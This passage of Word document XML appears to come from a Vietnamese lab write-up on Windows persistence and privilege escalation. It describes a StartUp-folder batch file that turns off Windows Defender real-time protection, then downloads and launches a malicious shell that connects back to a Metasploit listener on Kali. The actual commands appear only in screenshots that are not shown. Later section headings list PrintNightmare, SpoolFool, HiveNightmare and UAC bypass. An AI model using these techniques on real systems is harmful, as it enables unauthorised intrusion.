        <w:t xml:space="preserve"> full quyền với thư mục StartUp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114B5EA" w14:textId="2EFB0854" w:rsidR="000802E7" w:rsidRDefault="000802E7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 dụng file .bat sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B4BFD" w14:textId="6A6ADCE8" w:rsidR="000802E7" w:rsidRDefault="000802E7" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000802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6570F3" wp14:editId="664E71A6">
            <wp:extent cx="5943600" cy="2721610"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="92" name="Picture 92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white background with tex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78B4" w14:textId="0530EA52" w:rsidR="000802E7" w:rsidRDefault="000802E7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.bat này sẽ có các chức năng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A04CF" w14:textId="0F35C41D" w:rsidR="000802E7" w:rsidRDefault="000802E7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ắt chế độ Real Time của Windows Defence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB150F2" w14:textId="23E3E9BA" w:rsidR="000802E7" w:rsidRDefault="000802E7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Tải về shell độc hại và khởi chạy nó </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A3D83" w14:textId="21ACE1E7" w:rsidR="000802E7" w:rsidRDefault="000802E7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o mỗi lần khởi động, Windows Defence sẽ tự động bật =&gt; Nếu để shell độc hại trước đó, khi khởi động lại sẽ bị Windows Defence xóa mất)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00631152" w14:textId="739C2551" w:rsidR="00AE448A" w:rsidRDefault="00AE448A" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48508CE9" w14:textId="7962FEFA" w:rsidR="00AE448A" w:rsidRDefault="00AE448A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up Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DCC244" w14:textId="560B73DF" w:rsidR="00AE448A" w:rsidRDefault="000F2C8D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2C8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D90283" wp14:editId="6F16BADC">
            <wp:extent cx="5943600" cy="3544570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="Picture 9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05DC" w14:textId="4A0718A2" w:rsidR="000F2C8D" w:rsidRDefault="000F2C8D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restart máy windows, tại máy kali thu được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48EA61" w14:textId="6B6FF61F" w:rsidR="000F2C8D" w:rsidRDefault="000F2C8D" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2C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41E2DF" wp14:editId="05B00E57">
            <wp:extent cx="5943600" cy="3392170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="Picture 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0314" w14:textId="72B36E1A" w:rsidR="00737BB4" w:rsidRDefault="00737BB4" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00992AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>XI. Logon Autostart Execution (Registry Run Keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893C2D8" w14:textId="0EBA2979" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF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II. PrintNightmare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5BFAE" w14:textId="3DBD7BF6" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF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XIII. SpoolFool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949526D" w14:textId="1D5A6CF7" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF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IV. Hive Nightmare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113099C" w14:textId="0BC19019" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF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V. Selmpersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC1CACD" w14:textId="31304214" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF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VI. Automated Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2363B6C9" w14:textId="0B7E8717" w:rsidR="005C0DCF" w:rsidRDefault="005C0DCF" w:rsidP="0050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VII. Bypass UAC (User Account Control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460953FE" w14:textId="77777777" w:rsidR="00CB0E3A" w:rsidRDefault="00CB0E3A" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3577B34D" w14:textId="77777777" w:rsidR="00D00E86" w:rsidRDefault="00D00E86" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643CD8D2" w14:textId="77777777" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32315862" w14:textId="77777777" w:rsidR="000A4A79" w:rsidRDefault="000A4A79" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D38515C" w14:textId="54C135DE" w:rsidR="00A246B2" w:rsidRDefault="00A246B2" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B9DFCE" w14:textId="6DD69D64" w:rsidR="00A246B2" w:rsidRDefault="00A246B2" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1F4A57" w14:textId="77777777" w:rsidR="003C3BAE" w:rsidRDefault="003C3BAE" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8EE0DF" w14:textId="77777777" w:rsidR="003C3BAE" w:rsidRPr="00D31127" w:rsidRDefault="003C3BAE" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003C3BAE" w:rsidRPr="00D311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9517B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F861A20"/>
    <w:lvl w:ilvl="0" w:tplc="00983FF6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F3E9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5C8037E"/>
    <w:lvl w:ilvl="0" w:tplc="A48063B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755FA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D12AE968"/>
    <w:lvl w:ilvl="0" w:tplc="1B6EAC5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A9A"/>
    <w:rsid w:val="00050A54"/>
    <w:rsid w:val="00074688"/>
    <w:rsid w:val="000802E7"/>
    <w:rsid w:val="000A255F"/>
    <w:rsid w:val="000A4A79"/>
    <w:rsid w:val="000E254C"/>
    <w:rsid w:val="000F2C8D"/>
    <w:rsid w:val="00120C93"/>
    <w:rsid w:val="00137683"/>
    <w:rsid w:val="001841F1"/>
    <w:rsid w:val="001A7B7E"/>
    <w:rsid w:val="001B50E2"/>
    <w:rsid w:val="001C39D9"/>
    <w:rsid w:val="001E4722"/>
    <w:rsid w:val="00287059"/>
    <w:rsid w:val="002B507D"/>
    <w:rsid w:val="002C2150"/>
    <w:rsid w:val="002F150D"/>
    <w:rsid w:val="003523F9"/>
    <w:rsid w:val="0038109F"/>
    <w:rsid w:val="003C3BAE"/>
    <w:rsid w:val="003E1F95"/>
    <w:rsid w:val="00407527"/>
    <w:rsid w:val="00446DE2"/>
    <w:rsid w:val="004650FD"/>
    <w:rsid w:val="00500A9A"/>
    <w:rsid w:val="00501542"/>
    <w:rsid w:val="005076EA"/>
    <w:rsid w:val="005121F9"/>
    <w:rsid w:val="00542C9D"/>
    <w:rsid w:val="00564DFE"/>
    <w:rsid w:val="00572E42"/>
    <w:rsid w:val="00595AB3"/>
    <w:rsid w:val="005B6ADE"/>
    <w:rsid w:val="005C0A22"/>
    <w:rsid w:val="005C0DCF"/>
    <w:rsid w:val="005D2AED"/>
    <w:rsid w:val="00730838"/>
    <w:rsid w:val="00737BB4"/>
    <w:rsid w:val="0078331B"/>
    <w:rsid w:val="007A4925"/>
    <w:rsid w:val="007D0158"/>
    <w:rsid w:val="0081753C"/>
    <w:rsid w:val="00840484"/>
    <w:rsid w:val="00890198"/>
    <w:rsid w:val="008A5D33"/>
    <w:rsid w:val="008B2AC6"/>
    <w:rsid w:val="00904319"/>
    <w:rsid w:val="0091428E"/>
    <w:rsid w:val="00933A84"/>
    <w:rsid w:val="0098651F"/>
    <w:rsid w:val="00992AFF"/>
    <w:rsid w:val="009E5AE3"/>
    <w:rsid w:val="009E65F5"/>
    <w:rsid w:val="00A246B2"/>
    <w:rsid w:val="00AC02BF"/>
    <w:rsid w:val="00AC10A1"/>
    <w:rsid w:val="00AD4C17"/>
    <w:rsid w:val="00AE448A"/>
    <w:rsid w:val="00B130A1"/>
    <w:rsid w:val="00BB1CC8"/>
    <w:rsid w:val="00C45ADE"/>
    <w:rsid w:val="00CA04B2"/>
    <w:rsid w:val="00CA1438"/>
    <w:rsid w:val="00CB0E3A"/>
    <w:rsid w:val="00CC08C1"/>
    <w:rsid w:val="00D00E86"/>
    <w:rsid w:val="00D040D9"/>
    <w:rsid w:val="00D31127"/>
    <w:rsid w:val="00D7674C"/>
    <w:rsid w:val="00D8597C"/>
    <w:rsid w:val="00DB5DC3"/>
    <w:rsid w:val="00DE2270"/>
    <w:rsid w:val="00E12794"/>
    <w:rsid w:val="00E31E0E"/>
    <w:rsid w:val="00F306C9"/>
    <w:rsid w:val="00F34B04"/>
    <w:rsid w:val="00F445C0"/>
    <w:rsid w:val="00F96583"/>
    <w:rsid w:val="00FA332D"/>
    <w:rsid w:val="00FB4D63"/>
    <w:rsid w:val="00FC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917EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29D5F205-66C8-495A-A705-B509CF46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5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5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50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07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AA60-CA3F-468F-8311-93235B6F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4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Vuong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyen Quoc Vuong</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-21T01:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-19T04:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>